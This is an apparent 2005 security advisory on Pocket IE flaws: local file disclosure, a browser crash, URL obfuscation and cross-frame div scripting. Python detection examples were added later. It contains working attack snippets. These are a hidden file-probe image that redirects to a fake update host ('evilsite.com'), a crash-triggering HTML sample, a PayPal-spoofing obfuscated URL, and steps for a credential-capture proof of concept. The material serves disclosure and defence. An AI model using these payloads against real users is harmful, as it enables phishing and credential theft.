Note: this will only work in Pocket IE on a Windows Mobile Pocket PC

Pocket IE Local File Disclosure

In February 2007, it was discovered that Internet Explorer on all versions of the Windows operating system was vulnerable to a Local File Access vulnerability (http://www.xdisclose.com/XD100099.txt). While no mention was made of Pocket IE, it too is vulnerable in WM6 and earlier.

The following uses FlexWallet 2006 as an example of what an attacker could do with this.

<!-- The hidden image points at a file that only exists if FlexWallet is installed;
     onload fires only when the local file loads, so it doubles as an existence check. -->
<img style="visibility:hidden" src="file:///Program Files/FlexWallet 2006/Custom Icons/sample 2.ico" onload="conUser()">
<script>
function conUser(){
  alert("You are running an outdated version of FlexWallet. Please update your data files. You will now be redirected to upgrade site.");
  location.href="http://softwareupdate.flexwallet.com.evilsite.com/flexwallet/index.php";
}
</script>

Since the IE address bar is limited in size, the subdomain information is the only part of the URL the user sees.
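As an added detection example (not part of the original advisory), the following Python scans page markup for the probe pattern shown above: a hidden element whose source is a file: URL and which carries an onload/onerror handler. The sample page is constructed inline from the advisory's own snippet.

```python
from html.parser import HTMLParser

# Constructed sample: the FlexWallet probe from the advisory plus one benign image.
SAMPLE_PAGE = """
<html><body>
<img style=visibility:hidden src="file:///Program Files/FlexWallet 2006/Custom Icons/sample 2.ico" onload=conUser()>
<img src="http://example.invalid/logo.gif">
<script>function conUser(){}</script>
</body></html>
"""


class LocalFileProbeFinder(HTMLParser):
    """Collect elements whose src/href/data is a file: URL; report any event
    handler and whether the element is hidden (the existence-probe signature)."""
    SRC_ATTRS = ("src", "href", "data")

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        src = next((a[k] for k in self.SRC_ATTRS if k in a), "")
        if not src.lower().startswith("file:"):
            return
        style = a.get("style", "").replace(" ", "").lower()
        self.findings.append({
            "tag": tag,
            "path": src[len("file://"):],          # local path being probed
            "handlers": [k for k in a if k.startswith("on")],
            "hidden": "visibility:hidden" in style or "display:none" in style,
        })


def find_local_file_probes(html: str) -> list:
    """Return one finding per file:-sourced element in the given markup."""
    parser = LocalFileProbeFinder()
    parser.feed(html)
    parser.close()
    return parser.findings
```

A hidden element with a file: source and an onload handler is the combination worth alerting on; a plain file: link without a handler is far less interesting.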

Pocket IE Smash Overview
There is a minor bug in Pocket IE that will cause it to instantly crash. The problem is located in webview.dll and is related to how this file parses stylized <div> tags that contain <ul> or <ol> tags. The following HTML is provided as an illustration.

<style>
#layer1 div.sublayer1 { width:50%; margin:0 1 2 3; padding:4; float:right; }
#layer1 div.sublayer2 { width:50%; margin:0 1 2 3; padding:4; float:right; }
</style>
<div id="layer1">
<div class="sublayer1">
<ul>111</ul>
</div>
<div class="sublayer2">
<ul>222</ul>
</div>
</div>

For a demonstration, please visit the following link.

http://www.airscanner.com/tests/ie_flaw/piesmash.htm

We have notified Microsoft of this flaw.
Credit: Seth Fogie Feb 20, 2005

Pocket IE Attack Overview
There are several weaknesses in Pocket IE that can be used to trick end users into submitting local and/or sensitive data, such as usernames and passwords. The potential for exploiting these vulnerabilities is restricted only by an attacker's imagination. However, Pocket IE is not as powerful as its big brother, and as such, an attacker is limited in what techniques she can use to launch the attack. For example, Pocket IE has no support for the IFrame tag, which is extremely useful in XSS and browser-based attacks. In addition, Pocket IE does not support every JavaScript command commonly used by attackers. The final example presented below is an attempt to combine these individual flaws into one attack and is only meant to serve as a proof of concept.

Flaw 1: Unicode URL Obfuscation
Severity: Low
This particular attack is not new and has previously plagued PC-based browsers. Pocket IE (Windows Mobile SE 2003) is also vulnerable to this problem. In addition, Pocket IE processes the http protocol in a <protocol>://user:pass@website format. This itself is not a problem, but when combined with a Unicode URL it can cause confusion and mislead end users.

Example:
http://www.airscanner.com = 69.0.200.106 = %36%39%2E%30%2E%32%30%30%2E%31%30%36

Abuse: http://www.paypal.com&login.rand-%00%01AE67D12EF9090AB933@%36%39%2E%30%2E%32%30%30%2E%31%30%36/
will take you to http://www.airscanner.com/, not http://www.paypal.com
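To make the trick above concrete, here is an added Python example (not part of the advisory) that splits the URL the way a browser does, decodes the percent-encoded host, and lists the reasons the URL is deceptive. The two URLs are the advisory's own, reused as constructed test input.

```python
import ipaddress
from urllib.parse import unquote

# Constructed input: the abuse URL and a plain URL from the advisory.
ABUSE_URL = "http://www.paypal.com&login.rand-%00%01AE67D12EF9090AB933@%36%39%2E%30%2E%32%30%30%2E%31%30%36/"
PLAIN_URL = "http://www.airscanner.com/"


def percent_encode_all(text: str) -> str:
    """Encode every character as %XX, the way the advisory hides 69.0.200.106."""
    return "".join(f"%{ord(c):02X}" for c in text)


def split_authority(url: str) -> dict:
    """Break a URL into the parts the browser uses to choose the destination.
    As in WHATWG browsers, the host is whatever follows the LAST '@' in the
    authority; everything before it is userinfo and is never a hostname."""
    scheme, sep, rest = url.partition("://")
    if not sep:
        raise ValueError("expected scheme://")
    authority, _, path = rest.partition("/")
    userinfo, _, raw_host = authority.rpartition("@")   # ('', '', authority) if no '@'
    return {
        "scheme": scheme,
        "userinfo": userinfo,
        "raw_host": raw_host,
        "host": unquote(raw_host).lower(),   # %36%39%2E... -> 69.0.200.106
        "path": "/" + path,
    }


def deceptive_host_reasons(url: str) -> list:
    """Return why a URL looks like the user:pass@host trick; empty list if clean."""
    parts = split_authority(url)
    reasons = []
    if parts["userinfo"]:
        reasons.append("text before '@' (%r) is userinfo, not the destination" % parts["userinfo"])
    if "%" in parts["raw_host"]:
        reasons.append("host is percent-encoded (%s -> %s)" % (parts["raw_host"], parts["host"]))
    try:
        ipaddress.ip_address(parts["host"])
        reasons.append("destination is a bare IP address, not a brand domain")
    except ValueError:
        pass
    return reasons
```

A proxy or mail filter that applies deceptive_host_reasons to links before they reach a Pocket IE user catches all three tells at once; the address bar on the device shows only the decoy prefix.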

Flaw 2: Local File Access

Pocket IE will launch local files and either load them into the browser for viewing or launch them using their default program. This includes, but is not limited to, the following file types (these links are subject to OEM variations and may or may not work on your PDA). Click on each file type to test:

Flaw 3: <div> Tag XSS
Severity: Low
Strictly speaking, this is not a flaw. However, it helps provide a vector for attack, so it is worth mentioning. As it turns out, if a local file can be loaded into a framed window in Pocket IE, and this local file contains a named <div></div> section, then that section can be overwritten from a conjoined framed webpage. This is accomplished via JavaScript using 'innerHTML'. With this ability, the loaded local webpage can be overwritten by a loaded remote webpage. This type of attack does not work against webpages loaded from a remote host.

Combination Attack
The following example assumes one thing: that the attacker knows a folder name of the temporary IE store. These folders are randomly named each time a PDA is hard reset. Once set, they will remain as created even if deleted. The proof of concept assumes you know this folder name, or have access to this information. It only takes a second to browse to the '\Windows\Profiles\guest\Temporary Internet Files\Content.IE5' directory to learn these folder names.

This attack will demonstrate how having access to a local file can be a problem. Via URL obfuscation, <div> based XSS, and local file access, this attack will demonstrate how www.paypal.com username/password information can be captured from an unsuspecting end user. The following steps demonstrate this flaw. All captured information will be emailed to your 'paypal' email address...really, you can trust me.

  1. Clear Pocket IE history, cookie cache, and files (Tools-->Memory in Pocket IE) and reboot device.
  2. Load www.paypal.com in Pocket IE.
  3. Open File Explorer and go to \Windows\Windows\Profiles\guest\Temporary Internet Files\Content.IE5\ directory and locate file 'paypal[1]'. Note the folder name.
  4. Go to http://www.paypal.com and enter folder name when prompted (you must click this link, this takes you to http://www.airscanner.com/tests/ie_flaw/ie1.htm, not paypal.com).
  5. Let page 'load' and hit 'Yes' for certificate requests.
  6. Enter username and password and submit.

You will be sent to a page that briefly shows you the captured information, and then passed to Paypal.com for actual login. That's it...but that should be enough.

This concept came to our attention with the recent release of the Megan's Law websites. It shows the very dangerous side effects of allowing XFrame scripting. This example is not funny and should be taken seriously. Again, it will only work on Pocket IE.

http://www.pameganslaw.state.pa.us/SearchResults.aspx?Search=Zip%20Code&ZipCode=17508

It is also possible to use XFrame scripting directly against almost any site that uses <div> tags, assuming they have an 'id' value. For example, PHPBB often uses 'news' postings that can be overwritten or added to with this flaw. This does not require any local file access. An example of this follows, using a friend's site to demonstrate.

 http://johnny.ihackstuff.com

We have notified Microsoft of this flaw.
Credit: Seth Fogie Jan 22, 2005

Revision: 1/27/05
Typos in the hyperlinks caused them to fail. Thanks to Gerard Ivan Samija for noticing this and contacting us with the correct URLs.

Revision: 1/28/05
Megan's Law <span> tag X-frame website example added.

Revision: 1/29/05
PHPBB <div> tag X-frame scripting discussion added.

© 2005 Airscanner Corp.